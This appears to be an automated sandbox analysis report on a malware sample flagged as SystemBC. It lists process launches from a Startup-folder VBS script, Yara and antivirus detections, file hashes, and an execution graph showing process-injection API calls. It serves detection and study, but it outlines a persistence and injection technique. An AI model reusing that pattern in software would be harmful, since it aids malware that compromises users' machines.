                                            • Detection: 58%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:07:36:29
                                            Start date:16/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs"
                                            Imagebase:0x7ff741be0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:07:36:30
                                            Start date:16/12/2024
                                            Path:C:\Users\user\AppData\Local\brokerutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\brokerutil.exe"
                                            Imagebase:0x680000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2744031290.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000007.00000002.2726825474.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 58%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:07:36:42
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\faer\wopbv.exe"
                                            Imagebase:0xb60000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:10
                                            Start time:07:36:52
                                            Start date:16/12/2024
                                            Path:C:\Users\user\AppData\Local\brokerutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\brokerutil.exe"
                                            Imagebase:0x7ff799c70000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 0000000A.00000002.2724225667.0000000000575000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:07:37:01
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\ProgramData\faer\wopbv.exe
                                            Imagebase:0xc80000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 0000000B.00000002.3039485950.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:07:37:23
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\faer\wopbv.exe"
                                            Imagebase:0xd70000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:12.4%
                                              Dynamic/Decrypted Code Coverage:99.1%
                                              Signature Coverage:2.7%
                                              Total number of Nodes:339
                                              Total number of Limit Nodes:42
                                              execution_graph 61404 f86728 61405 f86745 61404->61405 61406 f86755 61405->61406 61410 5577621 61405->61410 61414 5576a97 61405->61414 61417 557876a 61405->61417 61411 5577640 61410->61411 61421 557d430 61411->61421 61416 557d430 VirtualProtect 61414->61416 61415 55701dc 61416->61415 61418 5578789 61417->61418 61420 557d430 VirtualProtect 61418->61420 61419 55787b4 61420->61419 61423 557d457 61421->61423 61425 557d930 61423->61425 61426 557d979 VirtualProtect 61425->61426 61428 5577667 61426->61428 61076 57170b2 61077 57170bc 61076->61077 61081 56ed608 61077->61081 61087 56ed618 61077->61087 61082 56ed618 61081->61082 61093 56ed84d 61082->61093 61096 56ed658 61082->61096 61099 56ed648 61082->61099 61088 56ed62d 61087->61088 61090 56ed84d 10 API calls 61088->61090 61091 56ed648 10 API calls 61088->61091 61092 56ed658 10 API calls 61088->61092 61089 56ed643 61090->61089 61091->61089 61092->61089 61094 56ed6b5 61093->61094 61102 56eec20 61094->61102 61097 56ed682 61096->61097 61098 56eec20 10 API calls 61097->61098 61098->61097 61100 56ed658 61099->61100 61101 56eec20 10 API calls 61100->61101 61101->61100 61103 56eec45 61102->61103 61117 56ef46c 61103->61117 61121 56ef211 61103->61121 61125 56ef391 61103->61125 61129 56ef152 61103->61129 61133 56ef592 61103->61133 61137 56ef396 61103->61137 61141 56ef329 61103->61141 61145 56ef079 61103->61145 61149 56ef5a9 61103->61149 61153 56ef088 61103->61153 61157 56ef21b 61103->61157 61161 56ef3fd 61103->61161 61104 56eec67 61104->61094 61118 56ef0ed 61117->61118 61119 56ef402 61118->61119 61165 56ef911 61118->61165 61119->61104 61122 56ef0ed 61121->61122 61123 56ef402 61122->61123 61124 56ef911 10 API calls 61122->61124 61123->61104 61124->61122 61126 56ef402 61125->61126 61127 56ef0ed 61125->61127 61126->61104 61127->61126 61128 56ef911 10 API calls 61127->61128 61128->61127 61131 56ef0ed 61129->61131 61130 56ef402 61130->61104 61131->61130 61132 56ef911 10 API calls 61131->61132 61132->61131 61135 56ef0ed 61133->61135 61134 56ef402 61134->61104 61135->61134 61136 56ef911 10 API calls 61135->61136 61136->61135 61139 56ef0ed 61137->61139 61138 56ef402 61138->61104 61139->61138 61140 56ef911 10 API calls 61139->61140 61140->61139 61142 56ef0ed 61141->61142 61143 56ef402 61142->61143 61144 56ef911 10 API calls 61142->61144 61143->61104 61144->61142 61147 56ef088 61145->61147 61146 56ef402 61146->61104 61147->61146 61148 56ef911 10 API calls 61147->61148 61148->61147 61151 56ef0ed 61149->61151 61150 56ef402 61150->61104 61151->61150 61152 56ef911 10 API calls 61151->61152 61152->61151 61154 56ef0b5 61153->61154 61155 56ef402 61154->61155 61156 56ef911 10 API calls 61154->61156 61155->61104 61156->61154 61158 56ef0ed 61157->61158 61159 56ef402 61158->61159 61160 56ef911 10 API calls 61158->61160 61159->61104 61160->61158 61162 56ef402 61161->61162 61163 56ef0ed 61161->61163 61162->61104 61163->61162 61164 56ef911 10 API calls 61163->61164 61164->61163 61166 56ef935 61165->61166 61191 56ef957 61166->61191 61195 56f0986 61166->61195 61200 56f0687 61166->61200 61205 56f1008 61166->61205 61211 56f09c9 61166->61211 61216 56f054b 61166->61216 61221 56f030b 61166->61221 61226 56f0e0d 61166->61226 61231 56f12b0 61166->61231 61236 56f04b2 61166->61236 61241 56f0cbf 61166->61241 61246 56f01ff 61166->61246 61251 56f1060 61166->61251 61256 56f0220 61166->61256 61264 56f03e1 61166->61264 61269 56f08a1 61166->61269 61274 56f10ec 61166->61274 61279 56f01ac 61166->61279 61284 56f062c 61166->61284 61289 56f06d3 61166->61289 61294 56f0a5a 61166->61294 61302 56f115b 61166->61302 61310 56f135e 61166->61310 61316 56f07df 61166->61316 61321 56f11c0 61166->61321 61329 56f0840 61166->61329 61334 56f1441 61166->61334 61339 56f0bc4 61166->61339 61191->61118 61197 56f0208 61195->61197 61196 56f00ac 61197->61196 61344 56f95f8 61197->61344 61348 56f95f0 61197->61348 61202 56f0208 61200->61202 61201 56f00ac 61202->61201 61203 56f95f8 WriteProcessMemory 61202->61203 61204 56f95f0 WriteProcessMemory 61202->61204 61203->61202 61204->61202 61206 56f0407 61205->61206 61207 56f1015 61205->61207 61352 56f9ce8 61206->61352 61356 56f9ce0 61206->61356 61208 56f0443 61213 56f0208 61211->61213 61212 56f00ac 61213->61212 61214 56f95f8 WriteProcessMemory 61213->61214 61215 56f95f0 WriteProcessMemory 61213->61215 61214->61213 61215->61213 61217 56f0208 61216->61217 61217->61216 61218 56f00ac 61217->61218 61219 56f95f8 WriteProcessMemory 61217->61219 61220 56f95f0 WriteProcessMemory 61217->61220 61219->61217 61220->61217 61222 56f031a 61221->61222 61224 56f95f8 WriteProcessMemory 61222->61224 61225 56f95f0 WriteProcessMemory 61222->61225 61223 56f03be 61223->61191 61224->61223 61225->61223 61228 56f0208 61226->61228 61227 56f00ac 61228->61227 61229 56f95f8 WriteProcessMemory 61228->61229 61230 56f95f0 WriteProcessMemory 61228->61230 61229->61228 61230->61228 61233 56f0208 61231->61233 61232 56f00ac 61233->61232 61234 56f95f8 WriteProcessMemory 61233->61234 61235 56f95f0 WriteProcessMemory 61233->61235 61234->61233 61235->61233 61238 56f0208 61236->61238 61237 56f00ac 61238->61237 61239 56f95f8 WriteProcessMemory 61238->61239 61240 56f95f0 WriteProcessMemory 61238->61240 61239->61238 61240->61238 61242 56f0208 61241->61242 61243 56f00ac 61242->61243 61244 56f95f8 WriteProcessMemory 61242->61244 61245 56f95f0 WriteProcessMemory 61242->61245 61244->61242 61245->61242 61248 56f0208 61246->61248 61247 56f00ac 61248->61247 61249 56f95f8 WriteProcessMemory 61248->61249 61250 56f95f0 WriteProcessMemory 61248->61250 61249->61248 61250->61248 61253 56f0208 61251->61253 61252 56f00ac 61253->61252 61254 56f95f8 WriteProcessMemory 61253->61254 61255 56f95f0 WriteProcessMemory 61253->61255 61254->61253 61255->61253 61257 56f022a 61256->61257 61360 56f92f8 61257->61360 61364 56f92f0 61257->61364 61258 56f00ac 61259 56f0208 61259->61258 61262 56f95f8 WriteProcessMemory 61259->61262 61263 56f95f0 WriteProcessMemory 61259->61263 61262->61259 61263->61259 61265 56f03eb 61264->61265 61267 56f9ce8 NtResumeThread 61265->61267 61268 56f9ce0 NtResumeThread 61265->61268 61266 56f0443 61267->61266 61268->61266 61271 56f0208 61269->61271 61270 56f00ac 61271->61270 61272 56f95f8 WriteProcessMemory 61271->61272 61273 56f95f0 WriteProcessMemory 61271->61273 61272->61271 61273->61271 61276 56f0208 61274->61276 61275 56f00ac 61276->61275 61277 56f95f8 WriteProcessMemory 61276->61277 61278 56f95f0 WriteProcessMemory 61276->61278 61277->61276 61278->61276 61281 56f01c1 61279->61281 61280 56f00ac 61281->61280 61282 56f95f8 WriteProcessMemory 61281->61282 61283 56f95f0 WriteProcessMemory 61281->61283 61282->61281 61283->61281 61285 56f0644 61284->61285 61368 56f1878 61285->61368 61373 56f1888 61285->61373 61286 56f065c 61291 56f0208 61289->61291 61290 56f00ac 61291->61290 61292 56f95f8 WriteProcessMemory 61291->61292 61293 56f95f0 WriteProcessMemory 61291->61293 61292->61291 61293->61291 61295 56f0a5c 61294->61295 61396 56f8838 61295->61396 61400 56f8830 61295->61400 61296 56f00ac 61297 56f0208 61297->61296 61300 56f95f8 WriteProcessMemory 61297->61300 61301 56f95f0 WriteProcessMemory 61297->61301 61300->61297 61301->61297 61303 56f0246 61302->61303 61305 56f0208 61302->61305 61306 56f92f8 VirtualAllocEx 61303->61306 61307 56f92f0 VirtualAllocEx 61303->61307 61304 56f00ac 61305->61304 61308 56f95f8 WriteProcessMemory 61305->61308 61309 56f95f0 WriteProcessMemory 61305->61309 61306->61305 61307->61305 61308->61305 61309->61305 61311 56f1368 61310->61311 61312 56f083f 61310->61312 61314 56f8838 Wow64SetThreadContext 61312->61314 61315 56f8830 Wow64SetThreadContext 61312->61315 61313 56f087b 61314->61313 61315->61313 61318 56f0208 61316->61318 61317 56f00ac 61318->61317 61319 56f95f8 WriteProcessMemory 61318->61319 61320 56f95f0 WriteProcessMemory 61318->61320 61319->61318 61320->61318 61322 56f11cf 61321->61322 61325 56f95f8 WriteProcessMemory 61322->61325 61326 56f95f0 WriteProcessMemory 61322->61326 61323 56f00ac 61324 56f0208 61324->61323 61327 56f95f8 WriteProcessMemory 61324->61327 61328 56f95f0 WriteProcessMemory 61324->61328 61325->61324 61326->61324 61327->61324 61328->61324 61330 56f084f 61329->61330 61332 56f8838 Wow64SetThreadContext 61330->61332 61333 56f8830 Wow64SetThreadContext 61330->61333 61331 56f087b 61332->61331 61333->61331 61335 56f0208 61334->61335 61336 56f00ac 61335->61336 61337 56f95f8 WriteProcessMemory 61335->61337 61338 56f95f0 WriteProcessMemory 61335->61338 61337->61335 61338->61335 61341 56f0208 61339->61341 61340 56f00ac 61341->61340 61342 56f95f8 WriteProcessMemory 61341->61342 61343 56f95f0 WriteProcessMemory 61341->61343 61342->61341 61343->61341 61345 56f9644 WriteProcessMemory 61344->61345 61347 56f96dd 61345->61347 61347->61197 61349 56f9644 WriteProcessMemory 61348->61349 61351 56f96dd 61349->61351 61351->61197 61353 56f9d31 NtResumeThread 61352->61353 61355 56f9d88 61353->61355 61355->61208 61357 56f9ce8 NtResumeThread 61356->61357 61359 56f9d88 61357->61359 61359->61208 61361 56f933c VirtualAllocEx 61360->61361 61363 56f93b4 61361->61363 61363->61259 61365 56f92f8 VirtualAllocEx 61364->61365 61367 56f93b4 61365->61367 61367->61259 61369 56f1888 61368->61369 61370 56f18c1 61369->61370 61378 56f1ed5 61369->61378 61383 56f1f51 61369->61383 61370->61286 61374 56f189f 61373->61374 61375 56f18c1 61374->61375 61376 56f1ed5 2 API calls 61374->61376 61377 56f1f51 2 API calls 61374->61377 61375->61286 61376->61375 61377->61375 61379 56f1ee4 61378->61379 61388 56f7f6e 61379->61388 61392 56f7f78 61379->61392 61384 56f1f79 61383->61384 61386 56f7f6e CreateProcessA 61384->61386 61387 56f7f78 CreateProcessA 61384->61387 61385 56f24f1 61386->61385 61387->61385 61389 56f7ff8 CreateProcessA 61388->61389 61391 56f81f4 61389->61391 61393 56f7ff8 CreateProcessA 61392->61393 61395 56f81f4 61393->61395 61397 56f8881 Wow64SetThreadContext 61396->61397 61399 56f88f9 61397->61399 61399->61297 61401 56f8838 Wow64SetThreadContext 61400->61401 61403 56f88f9 61401->61403 61403->61297 61429 57172e4 61430 57172ee 61429->61430 61434 56e6b88 61430->61434 61439 56e6b79 61430->61439 61431 5716f37 61435 56e6b9d 61434->61435 61437 56e6bb3 61435->61437 61444 56e80fe 61435->61444 61449 56e85c2 61435->61449 61437->61431 61440 56e6b88 61439->61440 61441 56e80fe 2 API calls 61440->61441 61442 56e6bb3 61440->61442 61443 56e85c2 2 API calls 61440->61443 61441->61442 61442->61431 61443->61442 61445 56e8108 61444->61445 61454 56ec584 61445->61454 61458 56ec590 61445->61458 61450 56e85c8 61449->61450 61452 56ec584 CopyFileA 61450->61452 61453 56ec590 CopyFileA 61450->61453 61451 56e865b 61452->61451 61453->61451 61455 56ec5ec CopyFileA 61454->61455 61457 56ec71d 61455->61457 61459 56ec5ec CopyFileA 61458->61459 61461 56ec71d 61459->61461 61462 5717359 61463 5717363 61462->61463 61467 51ad492 61463->61467 61473 51ad4a0 61463->61473 61464 5716f37 61464->61464 61468 51ad43c 61467->61468 61469 51ad49a 61467->61469 61468->61464 61478 51ad8e8 61469->61478 61483 51ad8d8 61469->61483 61470 51ad4cb 61470->61464 61474 51ad4b5 61473->61474 61476 51ad8d8 2 API calls 61474->61476 61477 51ad8e8 2 API calls 61474->61477 61475 51ad4cb 61475->61464 61476->61475 61477->61475 61480 51ad90f 61478->61480 61479 51adb04 61479->61470 61480->61479 61488 56e2038 61480->61488 61492 56e2030 61480->61492 61484 51ad90f 61483->61484 61485 51adb04 61484->61485 61486 56e2038 SleepEx 61484->61486 61487 56e2030 SleepEx 61484->61487 61485->61470 61486->61484 61487->61484 61489 56e207c SleepEx 61488->61489 61491 56e20dc 61489->61491 61491->61480 61493 56e2038 SleepEx 61492->61493 61495 56e20dc 61493->61495 61495->61480 61496 f3d01c 61497 f3d034 61496->61497 61498 f3d08f 61497->61498 61500 557dfb8 61497->61500 61501 557e011 61500->61501 61504 557e518 61501->61504 61502 557e046 61505 557e545 61504->61505 61506 557d430 VirtualProtect 61505->61506 61508 557e6db 61505->61508 61507 557e6cc 61506->61507 61507->61502 61508->61502 61509 56f73c0 61510 56f740f NtProtectVirtualMemory 61509->61510 61512 56f7487 61510->61512 61513 557ea68 61514 557eaac VirtualAlloc 61513->61514 61516 557eb19 61514->61516

                                              Executed Functions

                                              Function 00F8CBA2 Relevance: 2.6, Strings: 1, Instructions: 1339COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 370 f8cba2-f8cbde 371 f8cbe0 370->371 372 f8cbe5-f8cd07 370->372 371->372 376 f8cd09-f8cd1f 372->376 377 f8cd2b-f8cd37 372->377 654 f8cd25 call f8f740 376->654 655 f8cd25 call f8f732 376->655 378 f8cd39 377->378 379 f8cd3e-f8cd43 377->379 378->379 381 f8cd7b-f8cdc4 379->381 382 f8cd45-f8cd51 379->382 390 f8cdcb-f8d090 381->390 391 f8cdc6 381->391 383 f8cd58-f8cd76 382->383 384 f8cd53 382->384 385 f8e4df-f8e4e5 383->385 384->383 387 f8e510 385->387 388 f8e4e7-f8e507 385->388 388->387 417 f8dac0-f8dacc 390->417 391->390 418 f8dad2-f8db0a 417->418 419 f8d095-f8d0a1 417->419 428 f8dbe4-f8dbea 418->428 420 f8d0a8-f8d1cd 419->420 421 f8d0a3 419->421 456 f8d20d-f8d296 420->456 457 f8d1cf-f8d207 420->457 421->420 429 f8db0f-f8db8c 428->429 430 f8dbf0-f8dc28 428->430 445 f8db8e-f8db92 429->445 446 f8dbbf-f8dbe1 429->446 440 f8df86-f8df8c 430->440 443 f8dc2d-f8de2f 440->443 444 f8df92-f8dfda 440->444 537 f8dece-f8ded2 443->537 538 f8de35-f8dec9 443->538 453 f8dfdc-f8e04f 444->453 454 f8e055-f8e0a0 444->454 445->446 449 f8db94-f8dbbc 445->449 446->428 449->446 453->454 474 f8e4a9-f8e4af 454->474 484 f8d298-f8d2a0 456->484 485 f8d2a5-f8d329 456->485 457->456 477 f8e0a5-f8e0b5 474->477 478 f8e4b5-f8e4dd 474->478 488 f8e0c1-f8e127 477->488 478->385 487 f8dab1-f8dabd 484->487 511 f8d338-f8d3bc 485->511 512 f8d32b-f8d333 485->512 487->417 497 f8e129-f8e144 488->497 498 f8e14f-f8e15b 488->498 497->498 500 f8e15d 498->500 501 f8e162-f8e16e 498->501 500->501 502 f8e170-f8e17c 501->502 503 f8e181-f8e190 501->503 507 f8e490-f8e4a6 502->507 508 f8e199-f8e471 503->508 509 f8e192 503->509 507->474 544 f8e47c-f8e488 508->544 509->508 513 f8e2f8-f8e361 509->513 514 f8e28a-f8e2f3 509->514 515 f8e20d-f8e285 509->515 516 f8e19f-f8e208 509->516 517 f8e366-f8e3ce 509->517 560 f8d3cb-f8d44f 511->560 561 f8d3be-f8d3c6 511->561 512->487 513->544 514->544 515->544 516->544 549 f8e442-f8e448 517->549 545 f8df2f-f8df6c 537->545 546 f8ded4-f8df2d 537->546 562 f8df6d-f8df83 538->562 544->507 545->562 546->562 552 f8e44a-f8e454 549->552 553 f8e3d0-f8e42e 549->553 552->544 565 f8e430 553->565 566 f8e435-f8e43f 553->566 575 f8d45e-f8d4e2 560->575 576 f8d451-f8d459 560->576 561->487 562->440 565->566 566->549 582 f8d4f1-f8d575 575->582 583 f8d4e4-f8d4ec 575->583 576->487 589 f8d584-f8d608 582->589 590 f8d577-f8d57f 582->590 583->487 596 f8d60a-f8d612 589->596 597 f8d617-f8d69b 589->597 590->487 596->487 603 f8d6aa-f8d72e 597->603 604 f8d69d-f8d6a5 597->604 610 f8d73d-f8d7c1 603->610 611 f8d730-f8d738 603->611 604->487 617 f8d7d0-f8d854 610->617 618 f8d7c3-f8d7cb 610->618 611->487 624 f8d863-f8d8e7 617->624 625 f8d856-f8d85e 617->625 618->487 631 f8d8e9-f8d8f1 624->631 632 f8d8f6-f8d97a 624->632 625->487 631->487 638 f8d989-f8da0d 632->638 639 f8d97c-f8d984 632->639 645 f8da1c-f8daa0 638->645 646 f8da0f-f8da17 638->646 639->487 652 f8daac-f8daae 645->652 653 f8daa2-f8daaa 645->653 646->487 652->487 653->487 654->377 655->377
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2
                                              • API String ID: 0-450215437
                                              • Opcode ID: 3692c2f48253b66831cf0011d76d7a371e5bfac223be9f0e4be238cf9f347bc8
                                              • Instruction ID: 92f31e528d78a34816f566e48cf787c69d3f4e4bead8ebe4b702c6f03fe38dbc
                                              • Opcode Fuzzy Hash: 3692c2f48253b66831cf0011d76d7a371e5bfac223be9f0e4be238cf9f347bc8
                                              • Instruction Fuzzy Hash: 1FE2D274A052288FCB64EF69DC94B9EBBB2FB89300F1081E9D409A7355DB749E85DF40
                                              Function 0571CDA0 Relevance: 2.4, Strings: 1, Instructions: 1176COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: b2e9b6265384040c62a422a660c196ec6013ac37d42933bc4587a4dc2f04a90e
                                              • Instruction ID: 03f4f401e1350960d388826e93ca83bc4b8dd14767d0ffcb7e4581db278bc46d
                                              • Opcode Fuzzy Hash: b2e9b6265384040c62a422a660c196ec6013ac37d42933bc4587a4dc2f04a90e
                                              • Instruction Fuzzy Hash: 18B20974A00218CFDB24DFA8D994BADB7B6FF88300F144195E906AB2A5DB70ED41DF54
                                              Function 056F3998 Relevance: 1.9, Strings: 1, Instructions: 619COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1053 56f3998-56f39b9 1054 56f39bb 1053->1054 1055 56f39c0-56f3a50 call 56f4502 1053->1055 1054->1055 1060 56f3a56-56f3aa3 1055->1060 1063 56f3aa5-56f3ab0 1060->1063 1064 56f3ab2 1060->1064 1065 56f3abc-56f3bd7 1063->1065 1064->1065 1076 56f3be9-56f3c14 1065->1076 1077 56f3bd9-56f3bdf 1065->1077 1078 56f43df-56f43fb 1076->1078 1077->1076 1079 56f3c19-56f3d7c call 56f2878 1078->1079 1080 56f4401-56f441c 1078->1080 1091 56f3d8e-56f3f22 1079->1091 1092 56f3d7e-56f3d84 1079->1092 1102 56f3f87-56f3f91 1091->1102 1103 56f3f24-56f3f28 1091->1103 1092->1091 1106 56f41b8-56f41d7 1102->1106 1104 56f3f2a-56f3f2b 1103->1104 1105 56f3f30-56f3f82 1103->1105 1107 56f425d-56f42c8 1104->1107 1105->1107 1108 56f41dd-56f4207 1106->1108 1109 56f3f96-56f40dc call 56f2878 1106->1109 1126 56f42da-56f4325 1107->1126 1127 56f42ca-56f42d0 1107->1127 1115 56f425a-56f425b 1108->1115 1116 56f4209-56f4257 1108->1116 1138 56f40e2-56f41ae call 56f2878 1109->1138 1139 56f41b1-56f41b2 1109->1139 1115->1107 1116->1115 1129 56f432b-56f43c3 1126->1129 1130 56f43c4-56f43dc 1126->1130 1127->1126 1129->1130 1130->1078 1138->1139 1139->1106
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8
                                              • API String ID: 0-4194326291
                                              • Opcode ID: b7aa21d0006ed7e8ab3d5c97a1a5ed31dd56eee3809ca7fb973223c8e3ee5d76
                                              • Instruction ID: 0003728098b31a6b818adccd869744999705e31a5c56121802911458ce7a0e41
                                              • Opcode Fuzzy Hash: b7aa21d0006ed7e8ab3d5c97a1a5ed31dd56eee3809ca7fb973223c8e3ee5d76
                                              • Instruction Fuzzy Hash: F052F775E012298FDB64DF69C894AD9B7B1FF89300F1086EAD909A7345DB70AE81CF50
                                              Function 0571D0C7 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 14056fe9c8db29e96e9b9c96482e422df0306e2251bd16078fb3fe9e4973ba5c
                                              • Instruction ID: be9a599db195d9eaf0ba816734f852a89a93eeffbda0db908bd5c1d5ba48c35a
                                              • Opcode Fuzzy Hash: 14056fe9c8db29e96e9b9c96482e422df0306e2251bd16078fb3fe9e4973ba5c
                                              • Instruction Fuzzy Hash: 0022DC74A00218CFDB24DFA8D994BADB7B2FF48304F1481A9D909AB295DB70ED81DF54
                                              Function 056F73B8 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056F7475
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: d3eb1787848ff7a74eadc9d261385f80d3bf4f7184720e0cd8ab7194f15eedcc
                                              • Instruction ID: 9ee92bc1432b40c43688849c5da68cd3379e934eb044b4f795b850707319cae6
                                              • Opcode Fuzzy Hash: d3eb1787848ff7a74eadc9d261385f80d3bf4f7184720e0cd8ab7194f15eedcc
                                              • Instruction Fuzzy Hash: 1D4198B9D002589FCF00CFA9D980AEEFBB1BF08320F10952AE918B7250D735A905CF64
                                              Function 056F73C0 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056F7475
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: 6e49a386bc3008ec4e1e0404bdeee02fa060683cdf310a2561a8412c991e6d86
                                              • Instruction ID: f5609e56e7af8752e588eddde619964cbff3b63939ba64153d34024bd5572e3a
                                              • Opcode Fuzzy Hash: 6e49a386bc3008ec4e1e0404bdeee02fa060683cdf310a2561a8412c991e6d86
                                              • Instruction Fuzzy Hash: BA4187B5D042589FCF10CFAAD980ADEFBB1BB49310F10A42AE919B7210D775A905CF68
                                              Function 056F9CE0 Relevance: 1.6, APIs: 1, Instructions: 85nativethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 056F9D76
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a16b2615ca5fb426859cf57ac48f06f9ebe436ee2e7dbd6f0f25c30d4e40e5ff
                                              • Instruction ID: e9ef68b8ec3fc72a46519d07e8e62d79913758184583b604076d13c1bfb87f15
